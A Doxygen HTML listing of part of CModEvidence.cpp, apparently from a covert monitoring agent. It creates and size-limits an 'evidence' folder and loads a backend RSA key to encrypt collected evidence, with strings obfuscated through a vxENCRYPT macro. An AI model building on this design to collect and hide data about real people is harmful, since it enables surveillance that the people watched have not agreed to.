<div class="line"><a name="l00213"></a><span class="lineno">  213</span>&#160;    <span class="keywordflow">if</span> (_storageCurrentSize &lt; _storageMax &amp;&amp; !_core-&gt;evdMgr()-&gt;isEnabled()) {</div>
<div class="line"><a name="l00214"></a><span class="lineno">  214</span>&#160;        <span class="comment">// reenable evidence collection if we&#39;re into limits again and it was disabled before</span></div>
<div class="line"><a name="l00215"></a><span class="lineno">  215</span>&#160;        _core-&gt;evdMgr()-&gt;enable(<span class="keyword">true</span>);</div>
<div class="line"><a name="l00216"></a><span class="lineno">  216</span>&#160;    }</div>
<div class="line"><a name="l00217"></a><span class="lineno">  217</span>&#160;    <span class="keywordflow">return</span> 0;</div>
<div class="line"><a name="l00218"></a><span class="lineno">  218</span>&#160;}</div>
<div class="line"><a name="l00219"></a><span class="lineno">  219</span>&#160; </div>
<div class="line"><a name="l00229"></a><span class="lineno"><a class="line" href="CModEvidence_8cpp.html#a071a1d7a19dc50db4408fa36938b3d9a">  229</a></span>&#160;<span class="keyword">static</span> <span class="keywordtype">int</span> <a class="code" href="CModEvidence_8cpp.html#a071a1d7a19dc50db4408fa36938b3d9a">sizeWalkCallback</a>(<span class="keyword">const</span> <span class="keywordtype">char</span>* path, <span class="keywordtype">void</span>* context, <span class="keywordtype">int</span> depth, <span class="keyword">struct</span> dirent* entry) {</div>
<div class="line"><a name="l00230"></a><span class="lineno">  230</span>&#160;    <span class="keywordtype">size_t</span>* s = (<span class="keywordtype">size_t</span>*)context;</div>
<div class="line"><a name="l00231"></a><span class="lineno">  231</span>&#160;    uint64_t sz;</div>
<div class="line"><a name="l00232"></a><span class="lineno">  232</span>&#160;    <span class="keywordflow">if</span> (<a class="code" href="classBdUtils_1_1CFile.html#a70d61f1b302c3b42175434a07c4bb4e9">CFile::size</a>(path,&amp;sz) == 0) {</div>
<div class="line"><a name="l00233"></a><span class="lineno">  233</span>&#160;        <span class="comment">// add to size</span></div>
<div class="line"><a name="l00234"></a><span class="lineno">  234</span>&#160;        *s += sz;</div>
<div class="line"><a name="l00235"></a><span class="lineno">  235</span>&#160;    }</div>
<div class="line"><a name="l00236"></a><span class="lineno">  236</span>&#160;    <span class="keywordflow">return</span> 0;</div>
<div class="line"><a name="l00237"></a><span class="lineno">  237</span>&#160;}</div>
<div class="line"><a name="l00238"></a><span class="lineno">  238</span>&#160; </div>
<div class="line"><a name="l00239"></a><span class="lineno"><a class="line" href="classAgentPluginPrivate_1_1CModEvidence.html#a50f3808ead2904c16a8aeace1b806c72">  239</a></span>&#160;<span class="keywordtype">int</span> CModEvidence::evidenceStorageSize(uint64_t *s) {</div>
<div class="line"><a name="l00240"></a><span class="lineno">  240</span>&#160;    <a class="code" href="CLog_8h.html#a989e37701588731748694b31a0b424db">DBGLOGV</a>(<span class="keyword">nullptr</span>);</div>
<div class="line"><a name="l00241"></a><span class="lineno">  241</span>&#160;    <span class="keywordflow">if</span> (!s) {</div>
<div class="line"><a name="l00242"></a><span class="lineno">  242</span>&#160;        <span class="keywordflow">return</span> ENOENT;</div>
<div class="line"><a name="l00243"></a><span class="lineno">  243</span>&#160;    }</div>
<div class="line"><a name="l00244"></a><span class="lineno">  244</span>&#160; </div>
<div class="line"><a name="l00245"></a><span class="lineno">  245</span>&#160;    *s = 0;</div>
<div class="line"><a name="l00246"></a><span class="lineno">  246</span>&#160;    <a class="code" href="classBdUtils_1_1CFile.html#aa54396a8e24a19170a67012cd32362ec">CFile::walkDir</a>(_evdPath, <a class="code" href="CModEvidence_8cpp.html#a071a1d7a19dc50db4408fa36938b3d9a">sizeWalkCallback</a>, s, <span class="keyword">false</span>);</div>
<div class="line"><a name="l00247"></a><span class="lineno">  247</span>&#160;    <a class="code" href="CLog_8h.html#a989e37701588731748694b31a0b424db">DBGLOGV</a>(<span class="stringliteral">&quot;current size of the evidence folder=%lu&quot;</span>, *s);</div>
<div class="line"><a name="l00248"></a><span class="lineno">  248</span>&#160;    _storageCurrentSize = *s;</div>
<div class="line"><a name="l00249"></a><span class="lineno">  249</span>&#160;    <span class="keywordflow">return</span> 0;</div>
<div class="line"><a name="l00250"></a><span class="lineno">  250</span>&#160;}</div>
<div class="line"><a name="l00251"></a><span class="lineno">  251</span>&#160; </div>
<div class="line"><a name="l00252"></a><span class="lineno"><a class="line" href="classAgentPluginPrivate_1_1CModEvidence.html#a6b0bedde8de1e30b18103dde8cee5104">  252</a></span>&#160;<span class="keywordtype">int</span> CModEvidence::init(<a class="code" href="classAgentCore_1_1ICore.html">AgentCore::ICore</a> *core, <a class="code" href="structAgentPlugin_1_1__PluginInitStruct.html">PluginInitStruct</a> *params) {</div>
<div class="line"><a name="l00253"></a><span class="lineno">  253</span>&#160;    <a class="code" href="CLog_8h.html#a989e37701588731748694b31a0b424db">DBGLOGV</a>(<span class="keyword">nullptr</span>);</div>
<div class="line"><a name="l00254"></a><span class="lineno">  254</span>&#160;    <span class="comment">// set this plugin type</span></div>
<div class="line"><a name="l00255"></a><span class="lineno">  255</span>&#160;    _type = <a class="code" href="group__PLUGINS__INTERNAL.html#ga98814f0ed6e9b415084070f7640af5a2">PLUGIN_TYPE_EVIDENCE</a>;</div>
<div class="line"><a name="l00256"></a><span class="lineno">  256</span>&#160;    CPluginBase::init(core, params);</div>
<div class="line"><a name="l00257"></a><span class="lineno">  257</span>&#160;    </div>
<div class="line"><a name="l00258"></a><span class="lineno">  258</span>&#160;    <span class="comment">// create the evidence folder if it doesn&#39;t exist</span></div>
<div class="line"><a name="l00259"></a><span class="lineno">  259</span>&#160;    <a class="code" href="classBdUtils_1_1CString.html#a2e6bfd3823dae2a7437edc3f2aafc482">CString::joinPath</a>(core-&gt;<a class="code" href="classAgentCore_1_1ICore.html#a43a82fc12c623729a2c690becb7ba48f">basePath</a>(), core-&gt;<a class="code" href="classAgentCore_1_1ICore.html#adb8fdbcd57b38c6b929b6fd1017d5766">bp</a>()-&gt;<a class="code" href="classAgentCore_1_1IBinaryPatch.html#a7df96954b6d65952cf27d73421328cc3">evidencesFolderName</a>(),&amp;_evdPath);</div>
<div class="line"><a name="l00260"></a><span class="lineno">  260</span>&#160;    <span class="keywordtype">int</span> res = <a class="code" href="classBdUtils_1_1CFile.html#aeeda38cca76269518a57956cc09751c4">CFile::mkpath</a>(_evdPath);</div>
<div class="line"><a name="l00261"></a><span class="lineno">  261</span>&#160;    <span class="keywordflow">if</span> (res != 0) {</div>
<div class="line"><a name="l00262"></a><span class="lineno">  262</span>&#160;        <a class="code" href="CLog_8h.html#a6116789398e26a1c2bc635117a2e4960">DBGLOGE</a>(<span class="stringliteral">&quot;error creating evidence folder %s&quot;</span>, _evdPath);</div>
<div class="line"><a name="l00263"></a><span class="lineno">  263</span>&#160;        _initializedCorrectly = <span class="keyword">false</span>;</div>
<div class="line"><a name="l00264"></a><span class="lineno">  264</span>&#160;        <span class="keywordflow">return</span> res;</div>
<div class="line"><a name="l00265"></a><span class="lineno">  265</span>&#160;    }</div>
<div class="line"><a name="l00266"></a><span class="lineno">  266</span>&#160;    <a class="code" href="CLog_8h.html#a2b5d27a6100113b1a09dce32f08b6f07">DBGLOGI</a>(<span class="stringliteral">&quot;created/opened evidence folder: %s&quot;</span>, _evdPath);</div>
<div class="line"><a name="l00267"></a><span class="lineno">  267</span>&#160; </div>
<div class="line"><a name="l00268"></a><span class="lineno">  268</span>&#160;    <span class="comment">// initialize the used space</span></div>
<div class="line"><a name="l00269"></a><span class="lineno">  269</span>&#160;    evidenceStorageSize(&amp;_storageCurrentSize);</div>
<div class="line"><a name="l00270"></a><span class="lineno">  270</span>&#160; </div>
<div class="line"><a name="l00271"></a><span class="lineno">  271</span>&#160;    <span class="comment">// read config</span></div>
<div class="line"><a name="l00272"></a><span class="lineno">  272</span>&#160;    JsonObject&amp; config = ownConfiguration();</div>
<div class="line"><a name="l00273"></a><span class="lineno">  273</span>&#160;    <span class="keywordtype">int</span> max = config[<a class="code" href="obfuscate_8h.html#aeb960253580086e334d4f65300c10256">vxENCRYPT</a>(<span class="stringliteral">&quot;max_evidence_cache_mb&quot;</span>)];</div>
<div class="line"><a name="l00274"></a><span class="lineno">  274</span>&#160;    <span class="keywordflow">if</span> (max == 0) {</div>
<div class="line"><a name="l00275"></a><span class="lineno">  275</span>&#160;        <span class="comment">// use default</span></div>
<div class="line"><a name="l00276"></a><span class="lineno">  276</span>&#160;        _storageMax = <a class="code" href="CModEvidence_8h.html#ab4843c13499ba363f0fe0f9a4dddaff0">DEFAULT_STORAGE_MAX</a> * 1024 * 1000;</div>
<div class="line"><a name="l00277"></a><span class="lineno">  277</span>&#160;    }</div>
<div class="line"><a name="l00278"></a><span class="lineno">  278</span>&#160;    <span class="keywordflow">else</span> {</div>
<div class="line"><a name="l00279"></a><span class="lineno">  279</span>&#160;        _storageMax = max * 1024 * 1000;</div>
<div class="line"><a name="l00280"></a><span class="lineno">  280</span>&#160;    }</div>
<div class="line"><a name="l00281"></a><span class="lineno">  281</span>&#160;    <a class="code" href="CLog_8h.html#a2b5d27a6100113b1a09dce32f08b6f07">DBGLOGI</a>(<span class="stringliteral">&quot;max_evidence_cache_mb=%d (%&quot;</span> PRIu64 <span class="stringliteral">&quot;)&quot;</span>, max, _storageMax);</div>
<div class="line"><a name="l00282"></a><span class="lineno">  282</span>&#160; </div>
<div class="line"><a name="l00283"></a><span class="lineno">  283</span>&#160;    <span class="comment">// check if free space exceeds the maximum cache space</span></div>
<div class="line"><a name="l00284"></a><span class="lineno">  284</span>&#160;    uint64_t freeSpace;</div>
<div class="line"><a name="l00285"></a><span class="lineno">  285</span>&#160;    <a class="code" href="classBdUtils_1_1CFile.html#af2414b5d21096cbf5f1ba771b96a1d11">CFile::getFreeSpace</a>(_evdPath,&amp;freeSpace);</div>
<div class="line"><a name="l00286"></a><span class="lineno">  286</span>&#160;    <span class="keywordflow">if</span> (freeSpace &lt;= _storageMax) {</div>
<div class="line"><a name="l00287"></a><span class="lineno">  287</span>&#160;        <span class="comment">// revert to 10% of the free space</span></div>
<div class="line"><a name="l00288"></a><span class="lineno">  288</span>&#160;        uint32_t n = freeSpace * 10 / 100;</div>
<div class="line"><a name="l00289"></a><span class="lineno">  289</span>&#160;        <a class="code" href="CLog_8h.html#a111656e99a3f411e44b064c32a0d55af">DBGLOGW</a>(<span class="stringliteral">&quot;warning, too few free space, requested storage space=%d, effective free space=%d. Using 10% of free space=%d&quot;</span>, _storageMax, freeSpace, n);</div>
<div class="line"><a name="l00290"></a><span class="lineno">  290</span>&#160;        _storageMax = n;</div>
<div class="line"><a name="l00291"></a><span class="lineno">  291</span>&#160;    }</div>
<div class="line"><a name="l00292"></a><span class="lineno">  292</span>&#160; </div>
<div class="line"><a name="l00293"></a><span class="lineno">  293</span>&#160;    <span class="comment">// initialize the rsa key for evidences encryption</span></div>
<div class="line"><a name="l00294"></a><span class="lineno">  294</span>&#160;    uint32_t rsaKeySize=0;</div>
<div class="line"><a name="l00295"></a><span class="lineno">  295</span>&#160;    <span class="keywordtype">int</span> bits;</div>
<div class="line"><a name="l00296"></a><span class="lineno">  296</span>&#160;    <span class="keyword">const</span> uint8_t* backendPub = _core-&gt;bp()-&gt;backendRsaPub(&amp;bits, &amp;rsaKeySize);</div>
<div class="line"><a name="l00297"></a><span class="lineno">  297</span>&#160;    <span class="keywordflow">try</span> {</div>
<div class="line"><a name="l00298"></a><span class="lineno">  298</span>&#160;        _rsa = <span class="keyword">new</span> <a class="code" href="classBdUtils_1_1CRSA.html">CRSA</a>(backendPub, rsaKeySize, bits, rng(), <span class="keyword">false</span>);</div>
<div class="line"><a name="l00299"></a><span class="lineno">  299</span>&#160;    }</div>
<div class="line"><a name="l00300"></a><span class="lineno">  300</span>&#160;    <span class="keywordflow">catch</span> (...) {</div>
<div class="line"><a name="l00301"></a><span class="lineno">  301</span>&#160;        <a class="code" href="CLog_8h.html#a6116789398e26a1c2bc635117a2e4960">DBGLOGE</a>(<span class="stringliteral">&quot;error reading backend public key!&quot;</span>);</div>
<div class="line"><a name="l00302"></a><span class="lineno">  302</span>&#160;        res = EFAULT;</div>
<div class="line"><a name="l00303"></a><span class="lineno">  303</span>&#160;        _initializedCorrectly = <span class="keyword">false</span>;</div>
<div class="line"><a name="l00304"></a><span class="lineno">  304</span>&#160;    }</div>
<div class="line"><a name="l00305"></a><span class="lineno">  305</span>&#160;    <a class="code" href="CLog_8h.html#a2b5d27a6100113b1a09dce32f08b6f07">DBGLOGI</a>(<span class="stringliteral">&quot;initialized backend public key, bits=%d, DER size=%d&quot;</span>, bits, rsaKeySize);</div>
<div class="line"><a name="l00306"></a><span class="lineno">  306</span>&#160;    <span class="keywordflow">return</span> res;</div>
<div class="line"><a name="l00307"></a><span class="lineno">  307</span>&#160;}</div>
<div class="line"><a name="l00308"></a><span class="lineno">  308</span>&#160; </div>
<div class="line"><a name="l00309"></a><span class="lineno"><a class="line" href="classAgentPluginPrivate_1_1CModEvidence.html#ab1ef295fae56d4583089cddc3f881dfa">  309</a></span>&#160;CModEvidence::CModEvidence() : <a class="code" href="classAgentPluginPrivate_1_1CPluginBase.html">CPluginBase</a>(<a class="code" href="obfuscate_8h.html#aeb960253580086e334d4f65300c10256">vxENCRYPT</a>(<a class="code" href="CModEvidence_8cpp.html#a0acf7475326cdcd31d690b72033de33a">PLUGIN_NAME</a>)) {</div>
<div class="line"><a name="l00310"></a><span class="lineno">  310</span>&#160;    <a class="code" href="CLog_8h.html#a989e37701588731748694b31a0b424db">DBGLOGV</a>(<span class="keyword">nullptr</span>);</div>
<div class="line"><a name="l00311"></a><span class="lineno">  311</span>&#160;}</div>
<div class="line"><a name="l00312"></a><span class="lineno">  312</span>&#160; </div>
<div class="line"><a name="l00313"></a><span class="lineno"><a class="line" href="classAgentPluginPrivate_1_1CModEvidence.html#ac0d3ed24a044d654842f838a5add1026">  313</a></span>&#160;<a class="code" href="classAgentPluginPrivate_1_1CModEvidence.html#ac0d3ed24a044d654842f838a5add1026">CModEvidence::~CModEvidence</a>() {</div>
<div class="line"><a name="l00314"></a><span class="lineno">  314</span>&#160;    <a class="code" href="CLog_8h.html#a989e37701588731748694b31a0b424db">DBGLOGV</a>(<span class="keyword">nullptr</span>);</div>
<div class="line"><a name="l00315"></a><span class="lineno">  315</span>&#160;    <span class="keyword">delete</span> <a class="code" href="classAgentPluginPrivate_1_1CModEvidence.html#a9c027b2ff8f1eef6ed86686638802cb6">_rsa</a>;</div>
<div class="line"><a name="l00316"></a><span class="lineno">  316</span>&#160;    CMemory::free(<a class="code" href="classAgentPluginPrivate_1_1CModEvidence.html#afa16f5125216615f64f99c4219b65703">_evdPath</a>);</div>
<div class="line"><a name="l00317"></a><span class="lineno">  317</span>&#160;}</div>
</div><!-- fragment --></div><!-- contents -->
<div class="ttc" id="agroup__PLUGINS__INTERNAL_html_ga98814f0ed6e9b415084070f7640af5a2"><div class="ttname"><a href="group__PLUGINS__INTERNAL.html#ga98814f0ed6e9b415084070f7640af5a2">PLUGIN_TYPE_EVIDENCE</a></div><div class="ttdeci">#define PLUGIN_TYPE_EVIDENCE</div><div class="ttdoc">a special plugin which packages evidences (originally json) in a packed/encrypted/....</div><div class="ttdef"><b>Definition:</b> <a href="IPlugin_8h_source.html#l00043">IPlugin.h:42</a></div></div>
<div class="ttc" id="agroup__EVIDENCE__INTERNAL_html_ga4fb8d399ac90102d087ca9412d29501c"><div class="ttname"><a href="group__EVIDENCE__INTERNAL.html#ga4fb8d399ac90102d087ca9412d29501c">AgentCore::_EvidenceStartParams::out</a></div><div class="ttdeci">uint8_t * out</div><div class="ttdef"><b>Definition:</b> <a href="IEvidence_8h_source.html#l00030">IEvidence.h:30</a></div></div>
<div class="ttc" id="aclassBdUtils_1_1CFile_html_a401c3336849d580b8f25171da74a6b3b"><div class="ttname"><a href="classBdUtils_1_1CFile.html#a401c3336849d580b8f25171da74a6b3b">BdUtils::CFile::remove</a></div><div class="ttdeci">int remove(bool wipe=false)</div><div class="ttdef"><b>Definition:</b> <a href="CFile_8cpp_source.html#l00562">CFile.cpp:562</a></div></div>
<div class="ttc" id="aclassBdUtils_1_1CFile_html_a70d61f1b302c3b42175434a07c4bb4e9"><div class="ttname"><a href="classBdUtils_1_1CFile.html#a70d61f1b302c3b42175434a07c4bb4e9">BdUtils::CFile::size</a></div><div class="ttdeci">static int size(const char *path, uint64_t *size)</div><div class="ttdef"><b>Definition:</b> <a href="CFile_8cpp_source.html#l00137">CFile.cpp:137</a></div></div>
<div class="ttc" id="aclassBdUtils_1_1CFile_html_aeeda38cca76269518a57956cc09751c4"><div class="ttname"><a href="classBdUtils_1_1CFile.html#aeeda38cca76269518a57956cc09751c4">BdUtils::CFile::mkpath</a></div><div class="ttdeci">static int mkpath(const char *path, bool errorIfExist=false)</div><div class="ttdef"><b>Definition:</b> <a href="CFile_8cpp_source.html#l00304">CFile.cpp:304</a></div></div>
<div class="ttc" id="anamespaceAgentPlugin_html"><div class="ttname"><a href="namespaceAgentPlugin.html">AgentPlugin</a></div><div class="ttdef"><b>Definition:</b> <a href="CEvidenceManager_8h_source.html#l00011">CEvidenceManager.h:11</a></div></div>
<div class="ttc" id="aCPluginBase_8cpp_html_ac294a95d63deba8831a754100349423d"><div class="ttname"><a href="CPluginBase_8cpp.html#ac294a95d63deba8831a754100349423d">_instance</a></div><div class="ttdeci">IPlugin * _instance</div><div class="ttdef"><b>Definition:</b> <a href="CPluginBase_8cpp_source.html#l00016">CPluginBase.cpp:16</a></div></div>
<div class="ttc" id="aclassAgentCore_1_1IBinaryPatch_html_a7df96954b6d65952cf27d73421328cc3"><div class="ttname"><a href="classAgentCore_1_1IBinaryPatch.html#a7df96954b6d65952cf27d73421328cc3">AgentCore::IBinaryPatch::evidencesFolderName</a></div><div class="ttdeci">virtual const char * evidencesFolderName()=0</div></div>
<div class="ttc" id="aclassAgentPlugin_1_1IPlugin_html"><div class="ttname"><a href="classAgentPlugin_1_1IPlugin.html">AgentPlugin::IPlugin</a></div><div class="ttdoc">exposes plugins functionality to the core's plugin manager AgentCorePrivate::CPluginManager</div><div class="ttdef"><b>Definition:</b> <a href="IPlugin_8h_source.html#l00063">IPlugin.h:63</a></div></div>
<div class="ttc" id="agroup__EVIDENCE__INTERNAL_html_ga339499d0b71034c8546bb66d25bd066d"><div class="ttname"><a href="group__EVIDENCE__INTERNAL.html#ga339499d0b71034c8546bb66d25bd066d">AgentCore::_EvidenceStartParams::storageSize</a></div><div class="ttdeci">uint64_t storageSize</div><div class="ttdef"><b>Definition:</b> <a href="IEvidence_8h_source.html#l00028">IEvidence.h:28</a></div></div>
<div class="ttc" id="aclassAgentCore_1_1ICore_html_a43a82fc12c623729a2c690becb7ba48f"><div class="ttname"><a href="classAgentCore_1_1ICore.html#a43a82fc12c623729a2c690becb7ba48f">AgentCore::ICore::basePath</a></div><div class="ttdeci">virtual const char * basePath()=0</div></div>
<div class="ttc" id="aclassAgentCore_1_1ICore_html_adb8fdbcd57b38c6b929b6fd1017d5766"><div class="ttname"><a href="classAgentCore_1_1ICore.html#adb8fdbcd57b38c6b929b6fd1017d5766">AgentCore::ICore::bp</a></div><div class="ttdeci">virtual IBinaryPatch * bp()=0</div></div>
<div class="ttc" id="aclassAgentCore_1_1ICore_html_a8b9a299e9de7602159f6966e66444e9b"><div class="ttname"><a href="classAgentCore_1_1ICore.html#a8b9a299e9de7602159f6966e66444e9b">AgentCore::ICore::evdMgr</a></div><div class="ttdeci">virtual IEvidence * evdMgr()=0</div></div>
<div class="ttc" id="agroup__EVIDENCE__INTERNAL_html_ga48e7b89694845643759212d026351465"><div class="ttname"><a href="group__EVIDENCE__INTERNAL.html#ga48e7b89694845643759212d026351465">AgentCore::_EvidenceStartParams::inSize</a></div><div class="ttdeci">int inSize</div><div class="ttdef"><b>Definition:</b> <a href="IEvidence_8h_source.html#l00026">IEvidence.h:26</a></div></div>
<div class="ttc" id="agroup__EVIDENCE__INTERNAL_html_ga9eb6e189e7295dc2ba2af6bda819f6dc"><div class="ttname"><a href="group__EVIDENCE__INTERNAL.html#ga9eb6e189e7295dc2ba2af6bda819f6dc">EVIDENCE_STORAGE_SIZE</a></div><div class="ttdeci">#define EVIDENCE_STORAGE_SIZE</div><div class="ttdoc">to call the evidence plugin to get the current size of the evidence storage</div><div class="ttdef"><b>Definition:</b> <a href="IEvidence_8h_source.html#l00047">IEvidence.h:46</a></div></div>
<div class="ttc" id="aclassBdUtils_1_1CFile_html_a70e2f11e844cfe5e83146e1474567649"><div class="ttname"><a href="classBdUtils_1_1CFile.html#a70e2f11e844cfe5e83146e1474567649">BdUtils::CFile::fromBuffer</a></div><div class="ttdeci">static int fromBuffer(const char *path, uint8_t *buf, size_t size)</div><div class="ttdef"><b>Definition:</b> <a href="CFile_8cpp_source.html#l00020">CFile.cpp:20</a></div></div>
<div class="ttc" id="aclassBdUtils_1_1CString_html_a2e6bfd3823dae2a7437edc3f2aafc482"><div class="ttname"><a href="classBdUtils_1_1CString.html#a2e6bfd3823dae2a7437edc3f2aafc482">BdUtils::CString::joinPath</a></div><div class="ttdeci">static int joinPath(char *path1, size_t path1Size, const char *path2)</div><div class="ttdef"><b>Definition:</b> <a href="CString_8cpp_source.html#l00023">CString.cpp:23</a></div></div>
<div class="ttc" id="aCModEvidence_8cpp_html_a0acf7475326cdcd31d690b72033de33a"><div class="ttname"><a href="CModEvidence_8cpp.html#a0acf7475326cdcd31d690b72033de33a">PLUGIN_NAME</a></div><div class="ttdeci">#define PLUGIN_NAME</div><div class="ttdef"><b>Definition:</b> <a href="CModEvidence_8cpp_source.html#l00017">CModEvidence.cpp:16</a></div></div>
<div class="ttc" id="agroup__EVIDENCE__INTERNAL_html_ga4d1a4cebd5a893bed7f7d741b71dbc29"><div class="ttname"><a href="group__EVIDENCE__INTERNAL.html#ga4d1a4cebd5a893bed7f7d741b71dbc29">AgentCore::_EvidenceStartParams::storagePath</a></div><div class="ttdeci">char * storagePath</div><div class="ttdef"><b>Definition:</b> <a href="IEvidence_8h_source.html#l00027">IEvidence.h:27</a></div></div>
<div class="ttc" id="astructAgentPlugin_1_1__PluginInitStruct_html"><div class="ttname"><a href="structAgentPlugin_1_1__PluginInitStruct.html">AgentPlugin::_PluginInitStruct</a></div><div class="ttdoc">this gets passed through IPlugin::init() when a plugin is initialized</div><div class="ttdef"><b>Definition:</b> <a href="IPlugin_8h_source.html#l00029">IPlugin.h:29</a></div></div>
<div class="ttc" id="aclassAgentPluginPrivate_1_1CModEvidence_html_afa16f5125216615f64f99c4219b65703"><div class="ttname"><a href="classAgentPluginPrivate_1_1CModEvidence.html#afa16f5125216615f64f99c4219b65703">AgentPluginPrivate::CModEvidence::_evdPath</a></div><div class="ttdeci">char * _evdPath</div><div class="ttdef"><b>Definition:</b> <a href="CModEvidence_8h_source.html#l00083">CModEvidence.h:83</a></div></div>
<div class="ttc" id="aclassAgentPluginPrivate_1_1CModEvidence_html"><div class="ttname"><a href="classAgentPluginPrivate_1_1CModEvidence.html">AgentPluginPrivate::CModEvidence</a></div><div class="ttdoc">implements default on-disk evidence storage</div><div class="ttdef"><b>Definition:</b> <a href="CModEvidence_8h_source.html#l00067">CModEvidence.h:67</a></div></div>
<div class="ttc" id="agroup__EVIDENCE__INTERNAL_html_gabd852dd6e48372d695a19e827694ae1b"><div class="ttname"><a href="group__EVIDENCE__INTERNAL.html#gabd852dd6e48372d695a19e827694ae1b">EVIDENCE_REMOVE</a></div><div class="ttdeci">#define EVIDENCE_REMOVE</div><div class="ttdoc">to call the evidence plugin to remove an evidence</div><div class="ttdef"><b>Definition:</b> <a href="IEvidence_8h_source.html#l00042">IEvidence.h:41</a></div></div>
<div class="ttc" id="aclassBdUtils_1_1CAES_html_a974348e837aa79eda49537ee1e912bf7"><div class="ttname"><a href="classBdUtils_1_1CAES.html#a974348e837aa79eda49537ee1e912bf7">BdUtils::CAES::encryptCtr</a></div><div class="ttdeci">static int encryptCtr(uint8_t *key, int keyBits, uint8_t *nonce, void *in, size_t size, uint8_t **out)</div><div class="ttdef"><b>Definition:</b> <a href="CAES_8cpp_source.html#l00188">CAES.cpp:188</a></div></div>
<div class="ttc" id="aclassBdUtils_1_1CFile_html_aa54396a8e24a19170a67012cd32362ec"><div class="ttname"><a href="classBdUtils_1_1CFile.html#aa54396a8e24a19170a67012cd32362ec">BdUtils::CFile::walkDir</a></div><div class="ttdeci">static int walkDir(const char *path, DIRWALKCB cb, void *context=nullptr, bool recursive=true, int maxDepth=10, int currentDepth=0, bool removeDir=false)</div><div class="ttdef"><b>Definition:</b> <a href="CFile_8cpp_source.html#l00415">CFile.cpp:415</a></div></div>
<div class="ttc" id="aclassBdUtils_1_1CFile_html_a8a9183c9ab66e257ee97561bccc8b7c5"><div class="ttname"><a href="classBdUtils_1_1CFile.html#a8a9183c9ab66e257ee97561bccc8b7c5">BdUtils::CFile::toBuffer</a></div><div class="ttdeci">static int toBuffer(const char *path, uint8_t **buf, size_t *size=nullptr)</div><div class="ttdef"><b>Definition:</b> <a href="CFile_8cpp_source.html#l00037">CFile.cpp:37</a></div></div>
<div class="ttc" id="aclassAgentCore_1_1ICore_html"><div class="ttname"><a href="classAgentCore_1_1ICore.html">AgentCore::ICore</a></div><div class="ttdoc">exposes the application (agent) context AgentCorePrivate::CAppContext to the plugins</div><div class="ttdef"><b>Definition:</b> <a href="ICore_8h_source.html#l00032">ICore.h:32</a></div></div>
<div class="ttc" id="abdutils_8h_html"><div class="ttname"><a href="bdutils_8h.html">bdutils.h</a></div></div>
<div class="ttc" id="aclassBdUtils_1_1CMemory_html_af8b22a82a2b076989d9c001b736cfbc5"><div class="ttname"><a href="classBdUtils_1_1CMemory.html#af8b22a82a2b076989d9c001b736cfbc5">BdUtils::CMemory::free</a></div><div class="ttdeci">static void free(void *ptr)</div><div class="ttdef"><b>Definition:</b> <a href="CMemory_8cpp_source.html#l00015">CMemory.cpp:15</a></div></div>
<div class="ttc" id="aCLog_8h_html_a111656e99a3f411e44b064c32a0d55af"><div class="ttname"><a href="CLog_8h.html#a111656e99a3f411e44b064c32a0d55af">DBGLOGW</a></div><div class="ttdeci">#define DBGLOGW(...)</div><div class="ttdoc">prints WARNING debug log</div><div class="ttdef"><b>Definition:</b> <a href="CLog_8h_source.html#l00059">CLog.h:58</a></div></div>
<div class="ttc" id="aclassAgentPluginPrivate_1_1CModEvidence_html_ac0d3ed24a044d654842f838a5add1026"><div class="ttname"><a href="classAgentPluginPrivate_1_1CModEvidence.html#ac0d3ed24a044d654842f838a5add1026">AgentPluginPrivate::CModEvidence::~CModEvidence</a></div><div class="ttdeci">~CModEvidence() final</div><div class="ttdef"><b>Definition:</b> <a href="CModEvidence_8cpp_source.html#l00313">CModEvidence.cpp:313</a></div></div>
<div class="ttc" id="agroup__EVIDENCE__INTERNAL_html_gaf7722a418bb9513d53b5f63a1f45b660"><div class="ttname"><a href="group__EVIDENCE__INTERNAL.html#gaf7722a418bb9513d53b5f63a1f45b660">AgentCore::_EvidenceStartParams::evidencePath</a></div><div class="ttdeci">char * evidencePath</div><div class="ttdef"><b>Definition:</b> <a href="IEvidence_8h_source.html#l00029">IEvidence.h:29</a></div></div>
<div class="ttc" id="agroup__EVIDENCE__INTERNAL_html_ga9fd73bd75e66453d42897b6efacbb319"><div class="ttname"><a href="group__EVIDENCE__INTERNAL.html#ga9fd73bd75e66453d42897b6efacbb319">EVIDENCE_STORAGE_PATH</a></div><div class="ttdeci">#define EVIDENCE_STORAGE_PATH</div><div class="ttdoc">to call the evidence plugin to get the path of the evidence storage</div><div class="ttdef"><b>Definition:</b> <a href="IEvidence_8h_source.html#l00052">IEvidence.h:51</a></div></div>
<div class="ttc" id="aclassBdUtils_1_1CString_html_ad0d97b1b40fca18dee0788fb9fc36d7a"><div class="ttname"><a href="classBdUtils_1_1CString.html#ad0d97b1b40fca18dee0788fb9fc36d7a">BdUtils::CString::dup</a></div><div class="ttdeci">static char * dup(const char *s)</div><div class="ttdef"><b>Definition:</b> <a href="CString_8cpp_source.html#l00014">CString.cpp:14</a></div></div>
<div class="ttc" id="aclassBdUtils_1_1CRSA_html"><div class="ttname"><a href="classBdUtils_1_1CRSA.html">BdUtils::CRSA</a></div><div class="ttdoc">implements basic RSA encryption/decryption, using mbedtls</div><div class="ttdef"><b>Definition:</b> <a href="CRSA_8h_source.html#l00021">CRSA.h:21</a></div></div>
<div class="ttc" id="anamespaceBdUtils_html"><div class="ttname"><a href="namespaceBdUtils.html">BdUtils</a></div><div class="ttdef"><b>Definition:</b> <a href="CPluginBase_8h_source.html#l00016">CPluginBase.h:16</a></div></div>
<div class="ttc" id="agroup__EVIDENCE__INTERNAL_html_gab3661827a38a2a99bb944c5a873f98b4"><div class="ttname"><a href="group__EVIDENCE__INTERNAL.html#gab3661827a38a2a99bb944c5a873f98b4">AgentCore::_EvidenceStartParams::mode</a></div><div class="ttdeci">int mode</div><div class="ttdef"><b>Definition:</b> <a href="IEvidence_8h_source.html#l00024">IEvidence.h:24</a></div></div>
<div class="ttc" id="aCLog_8h_html_a6116789398e26a1c2bc635117a2e4960"><div class="ttname"><a href="CLog_8h.html#a6116789398e26a1c2bc635117a2e4960">DBGLOGE</a></div><div class="ttdeci">#define DBGLOGE(...)</div><div class="ttdoc">prints ERROR debug log</div><div class="ttdef"><b>Definition:</b> <a href="CLog_8h_source.html#l00063">CLog.h:62</a></div></div>
